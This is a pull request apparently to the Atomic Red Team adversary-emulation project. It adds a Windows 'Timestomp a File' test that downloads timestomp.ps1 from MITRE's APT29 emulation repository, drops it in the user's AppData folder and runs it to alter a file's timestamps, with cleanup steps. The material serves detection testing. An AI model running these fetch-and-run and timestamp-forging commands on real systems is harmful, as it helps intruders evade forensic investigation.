### PR TITLE
Update T1099.yaml - Timestomp

### DIFF
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -258,6 +258,7 @@ defense-evasion,T1099,Timestomp,4,Modify file timestamps using reference file
 defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell
 defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell
 defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell
+defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File
 defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
 defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt
 defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell

--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -116,6 +116,7 @@ defense-evasion,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Scri
 defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell
 defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell
 defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell
+defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File
 defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
 defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt
 defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell

--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -390,6 +390,7 @@
   - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
   - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
   - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
+  - Atomic Test #8: Windows - Timestomp a File [windows]
 - [T1127 Trusted Developer Utilities](../../T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -172,6 +172,7 @@
   - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
   - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
   - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
+  - Atomic Test #8: Windows - Timestomp a File [windows]
 - [T1127 Trusted Developer Utilities](../../T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -12852,6 +12852,38 @@ defense-evasion:
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
 '
+    - name: Windows - Timestomp a File
+      description: "Timestomp kxwn.lock.\n\nSuccessful execution will include the
+        placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify
+        the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: File path for timestomp payload
+          type: String
+          default: "$env:appdata\\Microsoft"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'timestomp.ps1 must be present in #{file_path}.'
+        prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
+          1}'
+        get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
+          -OutFile "#{file_path}\timestomp.ps1"
+      - description: 'kxwn.lock must be present in #{file_path}.'
+        prereq_command: if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
+          {exit 1}
+        get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "import-module #{file_path}\\timestomp.ps1\ntimestomp -dest \"#{file_path}\\kxwn.lock\"\n
+          \n"
+        cleanup_command: |-
+          Write-Host "Removing #{file_path}\timestomp.ps1"
+          Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
+          Write-Host "Removing #{file_path}\kxwn.lock"
+          Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
   T1127:
     technique:
       x_mitre_data_sources:

--- a/atomics/T1099/T1099.md
+++ b/atomics/T1099/T1099.md
@@ -18,6 +18,8 @@
 
 - [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell)
 
+- [Atomic Test #8 - Windows - Timestomp a File](#atomic-test-8---windows---timestomp-a-file)
+
 
 <br/>
 
@@ -283,6 +285,68 @@ if (Test-Path #{file_path}) {exit 0} else {exit 1}
 ```powershell
 New-Item -Path #{file_path} -Force | Out-Null
 Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Windows - Timestomp a File
+Timestomp kxwn.lock.
+
+Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. 
+
+[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_path | File path for timestomp payload | String | $env:appdata&#92;Microsoft|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+import-module #{file_path}\timestomp.ps1
+timestomp -dest "#{file_path}\kxwn.lock"
+```
+
+#### Cleanup Commands:
+```powershell
+Write-Host "Removing #{file_path}\timestomp.ps1"
+Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
+Write-Host "Removing #{file_path}\kxwn.lock"
+Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: timestomp.ps1 must be present in #{file_path}.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1"
+```
+##### Description: kxwn.lock must be present in #{file_path}.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path}\kxwn.lock -ItemType File
 ```
 
 

--- a/atomics/T1099/T1099.yaml
+++ b/atomics/T1099/T1099.yaml
@@ -188,3 +188,46 @@ atomic_tests:
       Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
     cleanup_command: |
       Remove-Item #{file_path} -Force -ErrorAction Ignore
+
+- name: Windows - Timestomp a File
+  description: |
+    Timestomp kxwn.lock.
+
+    Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. 
+
+    [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_path:
+      description: File path for timestomp payload
+      type: String
+      default: $env:appdata\Microsoft
+  
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        timestomp.ps1 must be present in #{file_path}.
+      prereq_command: |
+        if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1"
+    - description: |
+        kxwn.lock must be present in #{file_path}.
+      prereq_command: |
+        if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
+      get_prereq_command: |
+        New-Item -Path #{file_path}\kxwn.lock -ItemType File
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      import-module #{file_path}\timestomp.ps1
+      timestomp -dest "#{file_path}\kxwn.lock"
+       
+    cleanup_command: |
+      Write-Host "Removing #{file_path}\timestomp.ps1"
+      Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
+      Write-Host "Removing #{file_path}\kxwn.lock"
+      Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore


### PR DESCRIPTION
**Details:**
This is the Timestomp test used during recent [MITRE evals](https://attackevals.mitre.org/APT29/) - https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml




**Testing:**
Confirmed operation on Windows 10.

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->